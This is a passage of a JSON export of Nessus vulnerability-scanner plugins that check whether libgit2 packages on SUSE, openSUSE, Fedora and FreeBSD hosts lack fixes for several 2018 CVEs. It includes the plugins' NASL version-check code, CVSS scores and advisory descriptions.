get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-26-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-debugsource-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libgit2-devel-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-0.26.6-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libgit2-26-32bit-debuginfo-0.26.6-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-26 / libgit2-26-debuginfo / libgit2-debugsource / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:47:32", "description": "This update for libgit2 to version 0.26.5 fixes the following issues:\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out of bound read, allowing to read the base object, which could be exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta file, which could be exploited by an attacker t ocause a denial of service (DoS) (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a crafted .gitmodules file (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when processing smart-protocol 'ng' packets (bsc#1104641)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:2469-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libgit2", "p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo", "p-cpe:/a:novell:suse_linux:libgit2-debugsource", "p-cpe:/a:novell:suse_linux:libgit2-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2018-2469-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120086", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2469-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120086);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\", \"CVE-2018-11235\", \"CVE-2018-15501\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:2469-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for libgit2 to version 0.26.5 fixes the following issues:\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-10887: Fixed an integer overflow which in turn\n leads to an out of bound read, allowing to read the base\n object, which could be exploited by an attacker to cause\n denial of service (DoS) (bsc#1100613).\n\n - CVE-2018-10888: Fixed an out-of-bound read while reading\n a binary delta file, which could be exploited by an\n attacker t ocause a denial of service (DoS)\n (bsc#1100612).\n\n - CVE-2018-11235: Fixed a remote code execution, which\n could occur with a crafted .gitmodules file\n (bsc#1095219)\n\n - CVE-2018-15501: Prevent out-of-bounds reads when\n processing smart-protocol 'ng' packets (bsc#1104641)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10887/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10888/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-15501/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182469-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?179befed\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-1731=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-devel-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.6-3.5.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-devel-0.26.6-3.5.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:35", "description": "Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Fedora 27 : libgit2 (2018-fb071377ba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-FB071377BA.NASL", "href": "https://www.tenable.com/plugins/nessus/111250", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fb071377ba.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111250);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\");\n script_xref(name:\"FEDORA\", value:\"2018-fb071377ba\");\n\n script_name(english:\"Fedora 27 : libgit2 (2018-fb071377ba)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fb071377ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"libgit2-0.26.5-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:29:06", "description": "Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : libgit2 (2018-4d253dc945)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-4D253DC945.NASL", "href": "https://www.tenable.com/plugins/nessus/120404", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-4d253dc945.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120404);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\");\n script_xref(name:\"FEDORA\", value:\"2018-4d253dc945\");\n\n script_name(english:\"Fedora 28 : libgit2 (2018-4d253dc945)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.5 (CVE-2018-10887, CVE-2018-10888)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-4d253dc945\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libgit2-0.26.5-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-10-16T00:53:07", "description": "The Git community reports :\n\nOut-of-bounds reads when reading objects from a packfile", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-07-12T00:00:00", "type": "nessus", "title": "FreeBSD : Libgit2 -- multiple vulnerabilities (3c9b7698-84da-11e8-8c75-d8cb8abf62dd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:libgit2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3C9B769884DA11E88C75D8CB8ABF62DD.NASL", "href": "https://www.tenable.com/plugins/nessus/111019", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111019);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/11/10 11:49:46\");\n\n script_cve_id(\"CVE-2018-10887\", \"CVE-2018-10888\");\n\n script_name(english:\"FreeBSD : Libgit2 -- multiple vulnerabilities (3c9b7698-84da-11e8-8c75-d8cb8abf62dd)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Git community reports :\n\nOut-of-bounds reads when reading objects from a packfile\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.27.3\"\n );\n # https://vuxml.freebsd.org/freebsd/3c9b7698-84da-11e8-8c75-d8cb8abf62dd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ae743f25\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libgit2<0.27.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-08-19T12:30:52", "description": "This update for libgit2 fixes the following issues :\n\n - CVE-2018-8099: Fixed possible denial of service attack via different vectors by not being able to differentiate between these status codes (bsc#1085256).\n\n - CVE-2018-11235: With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server. (bsc#1095219)\n\n - CVE-2018-10887: It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may have lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker could have used this flaw to leak memory addresses or cause a Denial of Service. (bsc#1100613)\n\n - CVE-2018-10888: A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service.\n (bsc#1100612)\n\n - CVE-2018-15501: A remote attacker can send a crafted smart-protocol 'ng' packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS.\n (bsc#1104641)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"}, "published": "2018-10-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : libgit2 (openSUSE-2018-1314)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-15501", "CVE-2018-8099"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-24", "p-cpe:/a:novell:opensuse:libgit2-24-32bit", "p-cpe:/a:novell:opensuse:libgit2-24-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-24-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-1314.NASL", "href": "https://www.tenable.com/plugins/nessus/118486", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1314.\n#\n# The text description of this plugin is (C) SUSE 